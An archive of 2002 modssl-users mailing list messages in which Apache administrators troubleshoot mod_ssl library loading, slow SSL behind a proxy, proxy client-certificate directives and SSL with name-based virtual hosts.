Thread-Index: AcJ62EHRpvqorB9CTCebHErtVLsgvgAWC26g
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I suspect that the problem is that /usr/local/ssl is not on your
LD_LIBRARY_PATH. For a quick fix, add it. For a better solution (since
LD_LIBRARY_PATH is A Bad Thing), recompile with "-L/usr/local/ssl
-R/usr/local/ssl"..


-----Original Message-----
From: Zandi Patrick S TSgt AFRL/IFOSS [mailto:Patrick.Zandi@rl.af.mil]
Sent: Mittwoch, 23. Oktober 2002 23:03
To: 'modssl-users@modssl.org'
Subject: ld.so.1: /apache/bin/httpd: fatal: libssl.so.0.9.6: open failed


hello folks,   --- Got trouble.. here is the details  .. anyone see
anything..

./apachectl startssl
Syntax error on line 238 of /apache/conf/httpd.conf:
Cannot load /apache/libexec/libssl.so into server: ld.so.1:
/apache/bin/httpd: fatal: libssl.so.0.9.6: open failed: No such file or
directory
./apachectl startssl: httpd could not be started

Compile in modssl folder was:
    ./configure \
"--with-apache=../apache_1.3.27" \
"--with-ssl=/usr/local/ssl" \
"$@"

Compile in apache folder was:
 ./configure \
"--with-layout=Apache" \
"--verbose" \
"--prefix=/apache" \
"--server-uid=ars" \
"--server-gid=dba" \
"--with-perl=/usr/local/perl" \
"--enable-module=most" \
"--enable-shared=max" \
"--enable-rule=SHARED_CORE" \
"--enable-module=so" \
"--enable-module=cgi" \
"--enable-module=ssl" \
"--disable-rule=SSL_COMPAT" \
"--enable-rule=SSL_SDBM" \
"$@"

---httpd.conf  States from line 230 - 245 or so..

 234  LoadModule usertrack_module   libexec/mod_usertrack.so
   235  LoadModule unique_id_module   libexec/mod_unique_id.so
   236  LoadModule setenvif_module    libexec/mod_setenvif.so
   237  
   238  LoadModule ssl_module         libexec/libssl.so
   239  
   240

-- LS of   ../libexec    is
-rw-r--r--   1 root     other       8373 Oct 23 16:25 httpd.exp
-rwxr-xr-x   1 root     other      22108 Oct 23 16:25 libhttpd.ep
-rwxr-xr-x   2 root     other     669008 Oct 23 16:25 libhttpd.so
-rwxr-xr-x   2 root     other     669008 Oct 23 16:25 libhttpd.so.1
-rwxr-xr-x   1 root     other     137680 Oct 23 16:25 libproxy.so
-rwxr-xr-x   1 root     other     276708 Oct 23 16:25 libssl.so
-rwxr-xr-x   1 root     other       9272 Oct 23 16:25 mod_access.so

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 24 09:44:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA17472; Thu, 24 Oct 2002 09:43:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bru5-smtp-out2.be.uu.net id JAA17464; Thu, 24 Oct 2002 09:42:58 +0200 (MET DST)
Received: from srv-smtpout-pln1. (uu194-7-83-132.unknown.uunet.be [194.7.83.132])
	by bru5-smtp-out2.be.uu.net (8.11.6/8.11.2) with SMTP id g9O7gwR24705
	for ; Thu, 24 Oct 2002 09:42:58 +0200 (MET DST)
Received: from beela002.DLLife.net ([130.4.111.90])
 by srv-smtpout-pln1. (NAVGW 2.5.1.2) with SMTP id M2002102409241125984
 ; Thu, 24 Oct 2002 09:24:11 +0200
From: erwin.vogeleer@deltalloydLife.be
Subject: RE: SSL - MS Proxy 2.0 - MSIE6
To: modssl-users@modssl.org
X-Mailer: Lotus Notes Release 5.0.10  March 22, 2002
Message-ID: 
Date: Thu, 24 Oct 2002 09:42:36 +0200
X-MIMETrack: Serialize by Router on srv-ln-pln1/DeltaLloydLife(Release 5.0.10 |March 22, 2002) at
 24/10/2002 09:43:46
MIME-Version: 1.0
Content-type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: erwin.vogeleer@deltalloydLife.be
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


SSL is working perfect on other LANs where we don't use MS Proxy 2.0.

The webserver (apache/mod_ssl/openssl) server is a Pentium III 1.4MHz and
1GB of memory.
The certs are on the same server as apache/mod_ssl/openssl.

The specs of the proxy server I don't have at the moment. Are they also
important for the encription?


gr
Erwin






                                                                                                                                        
                      "Boyle Owen"                                                                                                      
                                                                           
                      m>                        cc:                                                                                     
                      Sent by:                  Subject:  RE: SSL - MS Proxy 2.0 - MSIE6                                                
                      owner-modssl-users                                                                                                
                      @modssl.org                                                                                                       
                                                                                                                                        
                                                                                                                                        
                      23/10/2002 16:55                                                                                                  
                      Please respond to                                                                                                 
                      modssl-users                                                                                                      
                                                                                                                                        
                                                                                                                                        




I rather meant what processor speed and memory, etc. SSL encryption and
decryption is fairly intense mathematically... Especially, your machines
should have enough RAM that they never need to swap.

Also, are any important files (certs etc.) on network drives which might
introduce a network latency.

-----Original Message-----
From: erwin.vogeleer@deltalloydLife.be
[mailto:erwin.vogeleer@deltalloydLife.be]
Sent: Mittwoch, 23. Oktober 2002 16:26
To: modssl-users@modssl.org
Subject: RE: SSL - MS Proxy 2.0 - MSIE6



The server is running NT4 and the clients XP and win2000.






"Boyle Owen"

m>                        cc:
Sent by:                  Subject:  RE: SSL - MS Proxy 2.0 - MSIE6
owner-modssl-users
@modssl.org
23/10/2002 16:19
Please respond to
modssl-users
What spec do you have on the server and client?

-----Original Message-----
From: erwin.vogeleer@deltalloydLife.be
[mailto:erwin.vogeleer@deltalloydLife.be]
Sent: Mittwoch, 23. Oktober 2002 16:09
To: modssl-users@modssl.org
Subject: SSL - MS Proxy 2.0 - MSIE6


Dear all,



I'm using:
Apache 1.3.26
mod_ssl: 2.8.10
openSSL: 0.9.6g

At the client site I use MSIE6 and I have a MS proxy 2.0.

When I enable SSL the connections/communication is very slooooow. If I
disable it, the site works perfect.

Does anybody have an idea?


thx
Erwin


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org





______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org





______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 24 10:16:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA18849; Thu, 24 Oct 2002 10:15:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from exchange.sds.no id KAA18772; Thu, 24 Oct 2002 10:14:56 +0200 (MET DST)
Received: by exchange.sds.no with Internet Mail Service (5.5.2654.42)
	id ; Thu, 24 Oct 2002 10:14:39 +0200
Message-ID: 
From: Torvald Baade Bringsvor 
To: "'modssl-users@modssl.org'" 
Subject: An apache web proxy with client auth?
Date: Thu, 24 Oct 2002 10:14:38 +0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2654.42)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Torvald Baade Bringsvor 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Sorry to bug you folks if this is a FAQ, but I haven't seen a clear answer
in the docs.

The situation I have is that some clients are connecting (via http) to an
apache configured as a reverse proxy, which then in turn connects to another
machine (again via http). Now there is a need to change the communication
between the apache and the third party machine to use https and the remote
server requires client certificates. 

Is it possible to configure apache + mod_ssl to authenticate itself to the
other server?

-Torvald
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 24 10:39:23 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA19539; Thu, 24 Oct 2002 10:38:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ware-mail.radware.co.il id KAA19490; Thu, 24 Oct 2002 10:37:31 +0200 (MET DST)
Received: by WARE-MAIL with Internet Mail Service (5.5.2653.19)
	id <45SX7KKV>; Thu, 24 Oct 2002 10:36:39 +0200
Message-ID: <45FCD7CD775DD411B4C100508B691BBB04B61F92@WARE-MAIL>
From: Alon Philosoph 
To: "'modssl-users@modssl.org'" 
Subject: RE: An apache web proxy with client auth?
Date: Thu, 24 Oct 2002 10:36:38 +0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alon Philosoph 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

As i see in the mod_ssl code (i haven't tried it myself) when compiling with
SSL_EXPERIMENTAL_PROXY
there are several directives that can be used for this situation:

SSLProxyVerifyDepth

SSLProxyCACertificateFile

SSLProxyCACertificatePath

Hope this helps.

Regards,
Alon

-----Original Message-----
From: Torvald Baade Bringsvor [mailto:Torvald.Bringsvor@ergo.no]
Sent: Thursday, October 24, 2002 10:15 AM
To: 'modssl-users@modssl.org'
Subject: An apache web proxy with client auth?



Sorry to bug you folks if this is a FAQ, but I haven't seen a clear answer
in the docs.

The situation I have is that some clients are connecting (via http) to an
apache configured as a reverse proxy, which then in turn connects to another
machine (again via http). Now there is a need to change the communication
between the apache and the third party machine to use https and the remote
server requires client certificates. 

Is it possible to configure apache + mod_ssl to authenticate itself to the
other server?

-Torvald
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 24 15:08:22 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA28194; Thu, 24 Oct 2002 15:07:22 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from src.samsung.ru id PAA28028; Thu, 24 Oct 2002 15:06:34 +0200 (MET DST)
Received: from src.samsung.ru [194.133.69.66]
	by src.samsung.ru (AltaVista Mail V2.0N/2.0N BL25N listener)
	id 0000_0053_3db7_f0c2_b037;
	Thu, 24 Oct 2002 17:08:18 +0400
Received: from Ivanov (106-109-1-230.samsung.ru [106.109.1.230]) by src.samsung.ru with SMTP (MailShield v2.04 - WIN32 Jul 17 2001 17:12:42); Thu, 24 Oct 2002 17:08:18 +0400
From: "Roman Ivanov" 
To: 
Subject: Chicken and Egg
Date: Thu, 24 Oct 2002 17:06:04 +0400
Message-ID: <000501c27b5e$1c181dc0$e6016d6a@Ivanov>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2627
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
X-SMTP-HELO: Ivanov
X-SMTP-MAIL-FROM: ivanov_r@samsung.ru
X-SMTP-RCPT-TO: modssl-users@modssl.org
X-SMTP-PEER-INFO: 106-109-1-230.samsung.ru [106.109.1.230]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Roman Ivanov" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello All!

I've just installed modssl. I want to clarify chicken and egg problem
for me.
I use modssl only for internal purposes so I use 1 self maded
certificate on two cites.
It is not problem that certificate does not match the site name.
I have in httpd.conf:


ServerName A
...other directives...



ServerName B
...other directives...


In logs:
[...] [warn]  Init: SSL server IP/port conflict: A:443 (httpd.conf:...)
vs. B:443 (httpd.conf:...)
[...] [warn]  Init: You should not use name-based virtual hosts in
conjunction with SSL!!


But https://B works and https://A works too.

Q
My question is: I didn't meet chicken and egg problem here because I
share one certificate between two servers?
Am I right?


Regards.
Roman Ivanov
CIS HQ SAMSUNG ELECTRONICS CO., LTD
web-master
TEL: +7-(095)-7972309
ICQ UIN #8160057

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 24 15:24:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA28997; Thu, 24 Oct 2002 15:23:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from arhosting.com id PAA28986; Thu, 24 Oct 2002 15:22:59 +0200 (MET DST)
Received: (qmail 3583 invoked by uid 104); 24 Oct 2002 13:00:58 -0000
Received: from barry@arhosting.com by speedy.arhosting.com with qmail-scanner-0.96 (uvscan: v4.1.50/v4147. . Clean. Processed in 0.906648 secs); 24 Oct 2002 13:00:58 -0000
Received: from unknown (HELO inferno.intranet.net) (165.29.94.254)
  by arhosting.com with SMTP; 24 Oct 2002 13:00:57 -0000
Subject: Re: Chicken and Egg
From: Barry Smoke 
To: modssl-users@modssl.org
In-Reply-To: <000501c27b5e$1c181dc0$e6016d6a@Ivanov>
References: <000501c27b5e$1c181dc0$e6016d6a@Ivanov>
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Ximian Evolution 1.0.8 (1.0.8-10) 
Date: 24 Oct 2002 08:21:49 -0500
Message-Id: <1035465710.1232.0.camel@inferno.intranet.net>
Mime-Version: 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Barry Smoke 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I have been wondering the same thing...
I have thought about self signing a couple and trying it out.


On Thu, 2002-10-24 at 08:06, Roman Ivanov wrote:
> Hello All!
> 
> I've just installed modssl. I want to clarify chicken and egg problem
> for me.
> I use modssl only for internal purposes so I use 1 self maded
> certificate on two cites.
> It is not problem that certificate does not match the site name.
> I have in httpd.conf:
> 
> 
> ServerName A
> ...other directives...
> 
> 
> 
> ServerName B
> ...other directives...
> 
> 
> In logs:
> [...] [warn]  Init: SSL server IP/port conflict: A:443 (httpd.conf:...)
> vs. B:443 (httpd.conf:...)
> [...] [warn]  Init: You should not use name-based virtual hosts in
> conjunction with SSL!!
> 
> 
> But https://B works and https://A works too.
> 
> Q
> My question is: I didn't meet chicken and egg problem here because I
> share one certificate between two servers?
> Am I right?
> 
> 
> Regards.
> Roman Ivanov
> CIS HQ SAMSUNG ELECTRONICS CO., LTD
> web-master
> TEL: +7-(095)-7972309
> ICQ UIN #8160057
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 24 16:20:19 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA00465; Thu, 24 Oct 2002 16:19:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0b.swx.com id QAA00441; Thu, 24 Oct 2002 16:18:19 +0200 (MET DST)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0b.swx.com (8.12.6/8.12.6) with ESMTP id g9OEIHHc016886
	for ; Thu, 24 Oct 2002 16:18:18 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0a.unix.swx.ch (8.12.6/8.12.6) with ESMTP id g9OEIHeQ012010
	for ; Thu, 24 Oct 2002 16:18:17 +0200 (MEST)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: Chicken and Egg
Date: Thu, 24 Oct 2002 16:18:16 +0200
Message-ID: <484A6CA492BE654395D208B1D8D5393972F6B9@SOMEXEVS001.ex.ordersx.org>
Thread-Topic: Chicken and Egg
Importance: normal
Thread-Index: AcJ7XpafODV4Jy61T0GetryfjaVZ/wABCHvw
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

What you see is predictable - your setup appears to work because apache
fetches the certificate from the first VH (since it can't tell which VH
to use). Once it gets a cert, it can then establish an SSL sssion and so
can then see inside the HTTP request. It can then see the Host header
and serve up the correct VH.

However, this is not a solution for the real world because, as you
observe, whenever you request the second VH, apache will use the cert
from the first VH and so the browser will report a conflict.

The way you have it set up leaves you vulnerable to man-in-the-middle
exploits since you have lost the *authentication* aspect of SSL. This is
equally as important as encryption. For example, imagine you sent your
money to be bank in a armoured car, but the bank turned out just to be a
front door...

I guess you will say, "but it's just a lab setup, I don't care about
authentication" - well that's fine, but why then do you need encryption?


-----Original Message-----
From: Roman Ivanov [mailto:ivanov_r@samsung.ru]
Sent: Donnerstag, 24. Oktober 2002 15:06
To: modssl-users@modssl.org
Subject: Chicken and Egg


Hello All!

I've just installed modssl. I want to clarify chicken and egg problem
for me.
I use modssl only for internal purposes so I use 1 self maded
certificate on two cites.
It is not problem that certificate does not match the site name.
I have in httpd.conf:


ServerName A
...other directives...



ServerName B
...other directives...


In logs:
[...] [warn]  Init: SSL server IP/port conflict: A:443 (httpd.conf:...)
vs. B:443 (httpd.conf:...)
[...] [warn]  Init: You should not use name-based virtual hosts in
conjunction with SSL!!


But https://B works and https://A works too.

Q
My question is: I didn't meet chicken and egg problem here because I
share one certificate between two servers?
Am I right?


Regards.
Roman Ivanov
CIS HQ SAMSUNG ELECTRONICS CO., LTD
web-master
TEL: +7-(095)-7972309
ICQ UIN #8160057

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 24 16:47:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA01069; Thu, 24 Oct 2002 16:46:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from [194.78.58.28] id QAA01060; Thu, 24 Oct 2002 16:45:32 +0200 (MET DST)
Received: from no.name.available by [194.78.58.28]
          via smtpd (for [129.132.7.153]) with SMTP; 24 Oct 2002 14:47:37 UT
Received: FROM papyrus.gial.be BY webshield1.gial.be ; Thu Oct 24 16:45:24 2002 +0200
Received: by papyrus.gial.be with Internet Mail Service (5.5.2653.19)
	id <4WRFNZB6>; Thu, 24 Oct 2002 16:45:24 +0200
Message-ID: <91455D4299CF6845BD09871DB8CC22B65A9A26@papyrus.gial.be>
From: Cabuzel Thierry 
To: "'modssl-users@modssl.org'" 
Subject: RE: Chicken and Egg
Date: Thu, 24 Oct 2002 16:45:24 +0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C27B6B.FC5E49B0"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cabuzel Thierry 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C27B6B.FC5E49B0
Content-Type: text/plain;
	charset="iso-8859-1"

> -----Original Message-----
> From: Boyle Owen [mailto:Owen.Boyle@swx.com]
> Sent: jeudi 24 octobre 2002 16:18
> To: modssl-users@modssl.org
> Subject: RE: Chicken and Egg
> 
> I guess you will say, "but it's just a lab setup, I don't care about
> authentication" - well that's fine, but why then do you need 
> encryption?

Perhaps he don't need encryption too :) I am seting up a web folder on my
web server with mod_dav. But the firewall of my company is soo old (well no
comment :))that he doesn't reconize some of the extension of then HTTP 1.1
protocol needed by mod_dav. He react to this by blocking theses request
rendering my web folder unuseable. My only work around, is to put my folder
in a ssl channel to go through the firewall letting him pass because he
can't control what's going on :) I just need the ssl channel. I don't bother
about the encryption (nothing would be enough as long as the firewall don't
try to block me) and less about of the authentification :)

------_=_NextPart_001_01C27B6B.FC5E49B0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable






RE: Chicken and Egg




> -----Original Message-----

> From: Boyle Owen [mailto:Owen.Boyle@swx.com]=


> Sent: jeudi 24 octobre 2002 16:18

> To: modssl-users@modssl.org

> Subject: RE: Chicken and Egg

> 

> I guess you will say, "but it's just a lab =
setup, I don't care about

> authentication" - well that's fine, but =
why then do you need 

> encryption?




Perhaps he don't need encryption too :) I am seting =
up a web folder on my web server with mod_dav. But the firewall of my =
company is soo old (well no comment :))that he doesn't reconize some of =
the extension of then HTTP 1.1 protocol needed by mod_dav. He react to =
this by blocking theses request rendering my web folder unuseable. My =
only work around, is to put my folder in a ssl channel to go through =
the firewall letting him pass because he can't control what's going on =
:) I just need the ssl channel. I don't bother about the encryption =
(nothing would be enough as long as the firewall don't try to block me) =
and less about of the authentification :)




------_=_NextPart_001_01C27B6B.FC5E49B0--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 24 17:31:19 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA02312; Thu, 24 Oct 2002 17:30:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id RAA02229; Thu, 24 Oct 2002 17:29:15 +0200 (MET DST)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id LAA18747;
	Thu, 24 Oct 2002 11:27:40 -0400
Date: Thu, 24 Oct 2002 11:27:40 -0400 (EDT)
From: "R. DuFresne" 
To: Cabuzel Thierry 
cc: "'modssl-users@modssl.org'" 
Subject: RE: Chicken and Egg
In-Reply-To: <91455D4299CF6845BD09871DB8CC22B65A9A26@papyrus.gial.be>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Thu, 24 Oct 2002, Cabuzel Thierry wrote:

> > -----Original Message-----
> > From: Boyle Owen [mailto:Owen.Boyle@swx.com]
> > Sent: jeudi 24 octobre 2002 16:18
> > To: modssl-users@modssl.org
> > Subject: RE: Chicken and Egg
> > 
> > I guess you will say, "but it's just a lab setup, I don't care about
> > authentication" - well that's fine, but why then do you need 
> > encryption?
> 
> Perhaps he don't need encryption too :) I am seting up a web folder on my
> web server with mod_dav. But the firewall of my company is soo old (well no
> comment :))that he doesn't reconize some of the extension of then HTTP 1.1
> protocol needed by mod_dav. He react to this by blocking theses request
> rendering my web folder unuseable. My only work around, is to put my folder
> in a ssl channel to go through the firewall letting him pass because he
> can't control what's going on :) I just need the ssl channel. I don't bother
> about the encryption (nothing would be enough as long as the firewall don't
> try to block me) and less about of the authentification :)
> 

If you are gaining ssl/https, you have encryption, you just do not have
authentication.  Thus you are tunneling the required needs ot the mod_dav
traffic within the encrypted ssl space to achieve your means of
circumventing the firewall/proxy wishes.  You might well be better off
here working with the firewall/proxy admin to define the needs and open
the proxy to serve them properly.  Otherwise, if you are circumventing
policy, you might find your access in deeper troubles once the
circumvention is discovered.

Owens' advise to the previous, primary requestor in this thread to good,
he suggests that that person actually do thing right and correct, to get
full use of what he has compiled and is trying to design, rather then
working with a semi-broken implimentation that does not fully grant the
authentication the clients of the website are going to trust and want.

Thanks,


Ron DuFresne
-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 24 18:38:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA04241; Thu, 24 Oct 2002 18:37:18 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from web12707.mail.yahoo.com id SAA04168; Thu, 24 Oct 2002 18:36:19 +0200 (MET DST)
Message-ID: <20021024163615.33896.qmail@web12707.mail.yahoo.com>
Received: from [203.200.195.2] by web12707.mail.yahoo.com via HTTP; Thu, 24 Oct 2002 09:36:15 PDT
Date: Thu, 24 Oct 2002 09:36:15 -0700 (PDT)
From: Anbuchezhian Chelliah 
Subject: RE: An apache web proxy with client auth?
To: modssl-users@modssl.org
In-Reply-To: <45FCD7CD775DD411B4C100508B691BBB04B61F92@WARE-MAIL>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Anbuchezhian Chelliah 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi !
Just one more but important directive is

SSLProxyMachineCertificateFile

Regards,
Anbu

--- Alon Philosoph  wrote:
> Hi,
> 
> As i see in the mod_ssl code (i haven't tried it
> myself) when compiling with
> SSL_EXPERIMENTAL_PROXY
> there are several directives that can be used for
> this situation:
> 
> SSLProxyVerifyDepth
> 
> SSLProxyCACertificateFile
> 
> SSLProxyCACertificatePath
> 
> Hope this helps.
> 
> Regards,
> Alon
> 
> -----Original Message-----
> From: Torvald Baade Bringsvor
> [mailto:Torvald.Bringsvor@ergo.no]
> Sent: Thursday, October 24, 2002 10:15 AM
> To: 'modssl-users@modssl.org'
> Subject: An apache web proxy with client auth?
> 
> 
> 
> Sorry to bug you folks if this is a FAQ, but I
> haven't seen a clear answer
> in the docs.
> 
> The situation I have is that some clients are
> connecting (via http) to an
> apache configured as a reverse proxy, which then in
> turn connects to another
> machine (again via http). Now there is a need to
> change the communication
> between the apache and the third party machine to
> use https and the remote
